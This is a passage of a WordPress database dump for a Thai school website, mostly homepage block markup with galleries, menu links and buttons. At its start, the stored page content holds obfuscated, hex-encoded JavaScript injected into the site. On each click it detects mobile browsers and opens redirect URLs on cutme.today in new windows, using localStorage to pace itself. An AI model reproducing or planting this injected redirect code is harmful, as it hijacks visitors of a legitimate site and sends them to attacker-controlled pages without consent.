_0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 21:49:47','2024-08-07 14:49:47','',14,'http://pakhaeng.ssk.in.th/?p=671',0,'revision','',0),
(672,1,'2024-08-07 21:50:28','2024-08-07 14:50:28','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":200,\"slidesScroll\":\"all\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 